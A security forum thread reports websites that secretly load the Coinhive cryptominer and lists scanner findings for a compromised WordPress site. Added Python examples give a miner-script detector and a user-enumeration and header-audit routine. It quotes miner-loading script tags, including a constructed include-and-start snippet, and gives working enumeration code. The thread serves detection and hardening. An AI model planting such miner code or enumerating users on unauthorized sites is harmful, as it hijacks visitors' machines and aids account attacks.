Topic: Smut sites on IP launch cryptominer scumware.

polonus (Avast Überevangelist, malware fighter)
Smut sites on IP launch cryptominer scumware.
« on: October 18, 2018, 10:25:16 PM »
Where: https://urlquery.net/report/3bbc6ddb-8370-44df-91d4-b0014f5bbbfa  (Do not visit, adult smut site).
Missed here: https://www.brightcloud.com/tools/url-ip-lookup.php
Flagged as carrying a cryptominer, as a lot of other pr0n sites are.

But other sites also launch unwanted crypto-miners: https://urlquery.net/report/04b2a892-65fa-4056-bce3-8716cef0b57d
Also missed here: https://www.brightcloud.com/tools/url-ip-lookup.php
The big ones do not detect it, while it has been compromised: https://www.virustotal.com/#/url/45521da6c6ba71b26d48c83783b22b8c44e442e70cfa38cb43a3e797b1f27cd4/detection
Quote
-youfinder.ru/telcodes/mobile/9365065720.php
     status: (referer=-http:/XXX/web?q=puppies)saved 7016 bytes 24fbc94c89396f634c6dd39437fda86edaa16f24
     info: [script] -cdnjs.cloudflare.com/ajax/libs/html5shiv/3.6.1/html5shiv.js
     info: [script] -youfinder.ru/assets/application-3d1d871c8e8fc6d639751d69b634bb11.js
     info: [script] -coinhive.com/lib/coinhive.min.js  * detected
     info: [script] -pagead2.googlesyndication.com/pagead/js/adsbygoogle.js
     info: [img] -mc.yandex.ru/watch/39963710
     info: [decodingLevel=0] found JavaScript
     error: undefined variable $
     error: undefined function $
     error: line:3: SyntaxError: missing = in XML attribute:
          error: line:3: <!DOCTYPE html>
          error: line:3: ..............^

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!
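The urlquery output above shows the loader pattern these reports key on: an external include of coinhive.com/lib/coinhive.min.js, usually followed by an inline call that instantiates and starts the miner. As an added example (not code from the forum post or from urlquery), the following checker finds that pattern in a fetched HTML document offline and prints the evidence defanged the way this thread does. The indicator list, the SAMPLE_PAGE / CLEAN_PAGE documents and the site-key placeholder are constructed for illustration.

```python
"""Offline check for the Coinhive loader pattern flagged in the urlquery
reports: an external coinhive.min.js include plus an inline
CoinHive.Anonymous / CoinHive.User ... .start() call.
Added example; indicators and sample pages are constructed."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed indicator list: hosts that served the Coinhive loader, and the
# inline API calls a page makes to start mining in the visitor's browser.
MINER_SCRIPT_HOSTS = {"coinhive.com", "authedmine.com"}
INLINE_MINER_PATTERNS = (
    re.compile(r"\bCoinHive\.(?:Anonymous|User)\s*\("),   # new CoinHive.Anonymous('key')
    re.compile(r"\b\w+\.start\s*\(\s*CoinHive\."),        # miner.start(CoinHive.IF_EXCLUSIVE_TAB)
)


class _ScriptCollector(HTMLParser):
    """Collect <script src=...> URLs and the bodies of inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def defang(url):
    """Render a URL the way this thread does (leading '-', hXXp) so a copied
    finding is not clickable."""
    return "-" + re.sub(r"^http", "hXXp", url, count=1, flags=re.I)


def find_miner_scripts(html):
    """Return [(kind, evidence)] for external loader includes and inline
    miner start calls found in an HTML document."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = (urlsplit(src).hostname or "").lower()   # None for relative paths
        if host in MINER_SCRIPT_HOSTS or any(host.endswith("." + h) for h in MINER_SCRIPT_HOSTS):
            findings.append(("external", defang(src)))
    for code in collector.inline:
        for pattern in INLINE_MINER_PATTERNS:
            match = pattern.search(code)
            if match:
                findings.append(("inline", match.group(0)))
                break
    return findings


# Constructed sample: the include/start pair from the reports above, next to a
# benign library include. The site key is a placeholder, not a real one.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/html5shiv/3.6.1/html5shiv.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
  var miner = new CoinHive.Anonymous('SITEKEY_PLACEHOLDER', {throttle: 0.3});
  miner.start();
</script>
</head><body><h1>constructed sample</h1></body></html>"""

# Constructed clean page: only a relative, first-party script.
CLEAN_PAGE = '<html><head><script src="/assets/app.js"></script></head><body></body></html>'

if __name__ == "__main__":
    for kind, evidence in find_miner_scripts(SAMPLE_PAGE):
        print(f"{kind:8s} {evidence}")
```

Point the checker at the raw HTML a scanner or a `curl` fetch from an isolated VM returned; do not load the page in your own browser, which is exactly the behaviour the thread warns against. Matching on the hostname rather than a substring avoids false hits on look-alike paths such as `/coinhive.com.html` on an unrelated host.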

polonus
Re: Smut sites on IP launch cryptominer scumware.
« Reply #1 on: December 19, 2018, 06:17:25 PM »
Detected from: -http://www.bordados.org.es/gimmea404error.html

Quote
Note: The script calls above appear to be cryptocurrency miners. Cryptocurrency miners are usually VERY resource intensive and Google will stop Adwords on sites running miners. If you are intentionally running a crypto miner you should reconsider!

Quote
<script src="htXps://coinhive dot com/lib/coinhive.min.js"></script>
flagged some 40 times:
https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=d3d3LmJdfSN8I11zLl19Zy57c2A%3D~enc

Only detected by Fortinet here:
https://www.virustotal.com/#/url/1f799654fe837c658d2d2c6650613587b9c279d1aad716c62671810916ff307e/detection
Also alerted on here: https://urlquery.net/report/c9dbd9ab-7954-4b47-9447-86eb8e2162c9
Various instances of known JavaScript malware, malware.cryptominer.3:
https://sitecheck.sucuri.net/results/www.bordados.org.es

WordPress version does not appear to be the latest, update!

Warning: User Enumeration is possible
The first two user IDs were tested to determine if user enumeration is possible.

ID   User   Login
1    None   admin
2    None   belen

It is recommended to rename the admin user account to reduce the chance of brute force attacks occurring, as this will reduce the chance of automated password attackers gaining access. However, it is important to understand that if the author archives are enabled it is usually possible to enumerate all users within a WordPress installation.

Given as Google Safe??? How come, as it is open to:
Susceptible to man-in-the-middle attacks: SSL not available
Vulnerabilities can be uncovered more easily: X-Powered-By header exposed
Vulnerable to cross-site attacks: HttpOnly cookies not used
Emails can be fraudulently sent: SPF not enabled

Recommendations: https://webhint.io/scanner/86ad6abe-96d7-4f94-8cfa-fcfcdf5dabe3

polonus (volunteer website security analyst and website error-hunter)
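The enumeration warning and the webhint findings in the reply above can be reproduced without a scanner. As an added example (not code from the forum post, Sucuri or webhint), the block below performs the author-archive test the way the scan describes it: WordPress answers /?author=N with a redirect to /author/<login>/ when author archives are enabled, so walking the IDs yields the logins. It also flags the no-TLS, X-Powered-By, HttpOnly and SPF findings from a response's headers and a domain's TXT records. The site wp.example.test, its users, its headers and the fake_fetch client are constructed for illustration, not taken from bordados.org.es.

```python
"""Offline reproduction of the WordPress user-enumeration test and the
header/SPF findings reported above. Added example; the fake site, users
and responses below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

AUTHOR_ARCHIVE = re.compile(r"^/author/([^/?#]+)/?")


def enumerate_wp_users(fetch, base_url, max_id=10, stop_after_misses=3):
    """fetch(url) -> (status, headers_dict), with redirects NOT followed.
    Returns {id: login} for every id whose /?author=<id> request redirects
    to an author archive. Stops after stop_after_misses consecutive
    non-redirects, so one deleted user id does not end the scan but a site
    that never redirects finishes quickly."""
    found, misses = {}, 0
    for uid in range(1, max_id + 1):
        status, headers = fetch(f"{base_url}/?author={uid}")
        match = None
        if status in (301, 302):
            match = AUTHOR_ARCHIVE.match(urlsplit(headers.get("Location", "")).path)
        if match:
            found[uid] = match.group(1)
            misses = 0
        else:
            misses += 1
            if misses >= stop_after_misses:
                break
    return found


def audit_headers(url, headers):
    """headers is a list of (name, value) pairs (Set-Cookie may repeat).
    Returns the webhint-style findings the reply lists: plain HTTP,
    exposed X-Powered-By, cookies set without HttpOnly."""
    findings = []
    if urlsplit(url).scheme.lower() != "https":
        findings.append("served over plain HTTP (no TLS): susceptible to man-in-the-middle")
    for name, value in headers:
        lname = name.lower()
        if lname == "x-powered-by":
            findings.append(f"X-Powered-By header exposed: {value}")
        elif lname == "set-cookie" and "httponly" not in value.lower():
            findings.append(f"cookie set without HttpOnly: {value.split('=', 1)[0]}")
    return findings


def has_spf(txt_records):
    """True when one of the domain's TXT records is an SPF policy."""
    return any(r.strip().lower().startswith("v=spf1") for r in txt_records)


# Constructed fake site: author archives enabled, users 1, 2 and 4 (id 3 was
# deleted), served over plain HTTP with a PHP banner and a session cookie
# that lacks HttpOnly.
FAKE_USERS = {1: "admin", 2: "belen", 4: "editor"}
FAKE_HEADERS = [
    ("X-Powered-By", "PHP/7.2.0"),
    ("Set-Cookie", "PHPSESSID=placeholder; path=/"),
    ("Set-Cookie", "wp-settings-time-1=1; path=/; HttpOnly"),
]


def fake_fetch(url):
    """Stand-in for an HTTP client that does not follow redirects."""
    uid = int(parse_qs(urlsplit(url).query).get("author", ["0"])[0])
    if uid in FAKE_USERS:
        return 302, {"Location": f"http://wp.example.test/author/{FAKE_USERS[uid]}/"}
    return 404, {}


if __name__ == "__main__":
    print("users:", enumerate_wp_users(fake_fetch, "http://wp.example.test"))
    for finding in audit_headers("http://wp.example.test/", FAKE_HEADERS):
        print("finding:", finding)
    print("SPF present:", has_spf([]))
```

To run this against a site you are authorized to test, replace fake_fetch with a client that returns the first response unchanged (for example `requests.get(url, allow_redirects=False)`), since a client that follows the 302 would hand back the archive page instead of the Location header the check parses. The mitigation the scan recommends is the counterpart of this test: renaming admin removes the guaranteed first target, and disabling author archives (or redirecting /?author= requests) removes the login leak altogether.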